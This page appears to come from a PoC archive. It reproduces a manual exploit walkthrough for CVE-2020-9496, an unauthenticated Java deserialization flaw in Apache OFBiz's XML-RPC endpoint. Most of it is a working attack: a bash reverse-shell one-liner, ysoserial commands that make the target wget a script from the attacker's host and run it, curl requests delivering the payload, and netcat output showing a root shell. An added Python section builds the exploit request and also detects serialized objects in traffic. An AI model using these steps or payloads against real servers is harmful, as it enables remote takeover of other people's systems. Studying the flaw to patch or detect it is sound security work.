Related vulnerability
Title: Apache OFBiz code issue vulnerability (CVE-2020-9496). Description: Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Software Foundation. It provides a suite of Java-based web application components and tools. Apache OFBiz 17.12.03 contains a code issue vulnerability caused by the web application not validating client-supplied data correctly. An attacker who sends crafted client data can exploit it to execute arbitrary code on the server.
Description
CVE-2020-9496 manual exploit
Introduction
# CVE-2020-9496 - RCE
Because the two XML-RPC related requests in webtools (xmlrpc and ping) do not use authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.
This vulnerability exists because Java objects embedded in requests sent to /webtools/control/xmlrpc are deserialized before any authentication takes place. A remote unauthenticated attacker can exploit this by sending a single crafted request. Successful exploitation results in arbitrary code execution as the user running OFBiz.
# Affected Versions: 17.12.03 and earlier (this PoC was run against 17.12.01)
# Fixed Versions: 17.12.04, 18.12.01
Original advisory (GitHub Security Lab): https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
This PoC works in two stages, each delivered with curl as a serialized Java object inside an XML-RPC request: the first payload makes the target download a reverse-shell script over HTTP, the second executes it. The first stage uses wget on the target, so the target needs wget installed and outbound HTTP access to your host.
### STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.
```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service
```
$ sudo python3 -m http.server 80
```
### STEP 3: Generate Payload via ysoserial - Change IP
```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 4: Copy The Output of Your Payload - Very Long String
```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```
### STEP 5: Use the curl command below to deliver the payload. Paste the base64 string after `extensions">`, i.e. between the opening and closing `serializable` tags
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### Curl Command Without Payload For Your Reference
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution
```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see, we got a hit on our HTTP server: the target downloaded the file to /tmp/shell.sh. That GET request is already proof of unauthenticated code execution on the target, independent of whether the reverse shell succeeds later. To execute the script, generate a second payload, but before you do, start a netcat listener.
### STEP 6: Start NetCat Listener
```
$ nc -lvnp 1337
listening on [any] 1337 ...
```
### STEP 7: Create Payload To Execute Previously Downloaded Shell Script
```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It
```
curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'
```
### STEP 9: Check NetCat Listener For Reverse Connection
```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```
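The envelope sent in Steps 5 and 8 is the whole attack: an XML-RPC struct member whose value is a `serializable` element from the Apache XML-RPC extensions namespace, carrying a base64-encoded Java object. The following is an added example, not code from the original README, from Apache OFBiz or from the advisory. It builds that envelope from a base64 blob so the very long string never has to be pasted into a shell one-liner, and, for the defensive side, scans a request body for `serializable` elements whose content decodes to a Java serialization stream (the `rO0AB` prefix visible in the payload above is the base64 form of the stream magic `AC ED 00 05`) and names the first class in the stream. The sample stream is constructed here: it reuses the README's visible payload prefix and completes the 23-byte class name with `java.util.PriorityQueue`, which is an assumption, not the README's real gadget chain.

```python
import base64
import binascii
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC + STREAM_VERSION written by ObjectOutputStream
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72       # type codes from the Java Object Serialization Stream Protocol


def build_xmlrpc_request(payload_b64, method="ProjectDiscovery", member="test"):
    """Return the request body the README passes to curl -d.

    method and member are arbitrary (the README uses ProjectDiscovery/test): the
    Apache XML-RPC parser instantiates the <serializable> value while reading the
    request, before any method dispatch.
    """
    return (
        '<?xml version="1.0"?><methodCall><methodName>{m}</methodName>'
        '<params><param><value><struct><member><name>{n}</name>'
        '<value><serializable xmlns="{ns}">{p}</serializable></value>'
        '</member></struct></value></param></params></methodCall>'
    ).format(m=escape(method), n=escape(member), ns=XMLRPC_EXT_NS, p=payload_b64).encode()


def java_stream_first_class(raw):
    """Return the first class name in a Java serialization stream, or None.

    Only the common TC_OBJECT/TC_CLASSDESC opening is decoded; that is enough to
    put the gadget chain's entry class into an alert. Truncated streams give None.
    """
    if not raw.startswith(JAVA_SERIAL_MAGIC) or len(raw) < 8:
        return None
    if raw[4] != TC_OBJECT or raw[5] != TC_CLASSDESC:
        return None
    name_len = int.from_bytes(raw[6:8], "big")   # className is a Java UTF: 2-byte length + bytes
    name = raw[8:8 + name_len]
    if len(name) != name_len:
        return None
    return name.decode("utf-8", errors="replace")


def find_serialized_objects(xml_body):
    """Scan an XML-RPC request body for <serializable> elements in the extensions
    namespace whose content decodes to a Java serialization stream.

    Returns a list of (first_class_name_or_None, raw_stream_bytes). Malformed XML
    yields []. For production traffic parse with defusedxml instead of ElementTree
    so that entity-expansion tricks cannot be used against the detector itself.
    """
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return []
    hits = []
    for el in root.iter("{%s}serializable" % XMLRPC_EXT_NS):
        text = "".join((el.text or "").split())   # tolerate line-wrapped base64
        try:
            raw = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.startswith(JAVA_SERIAL_MAGIC):
            hits.append((java_stream_first_class(raw), raw))
    return hits


# Constructed sample stream: the README's visible payload prefix decodes to the stream
# header, TC_OBJECT, TC_CLASSDESC and a 23-byte class name starting "java.ut"; the rest
# of the name is filled in here with "il.PriorityQueue" as an assumption. It is NOT a
# working gadget chain, only enough of a stream to exercise the detector.
SAMPLE_STREAM = base64.b64decode("rO0ABXNyABdqYXZhLnV0") + b"il.PriorityQueue"
SAMPLE_B64 = base64.b64encode(SAMPLE_STREAM).decode()

if __name__ == "__main__":
    body = build_xmlrpc_request(SAMPLE_B64)
    for cls, raw in find_serialized_objects(body):
        print("Java object in XML-RPC request, first class: %s (%d bytes)" % (cls, len(raw)))
```

To use the builder with a real ysoserial payload, pass the output of Step 3 or Step 7 as `payload_b64` and write the returned bytes to a file for `curl --data-binary @file`. The detector is meant to run over captured POST bodies to /webtools/control/xmlrpc (or /webtools/control/ping); any hit is an exploitation attempt, since no legitimate OFBiz client sends Java objects through that element.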
File snapshot
[4.0K] /data/pocs/7b7246682bc76e6b6d8c92e86f1ed29af97e15e8
└── [4.1K] README.md
0 directories, 1 file
Notes
1. Prefer accessing the PoC through its original source.
2. If the source has been removed or is unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has snapshotted this POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.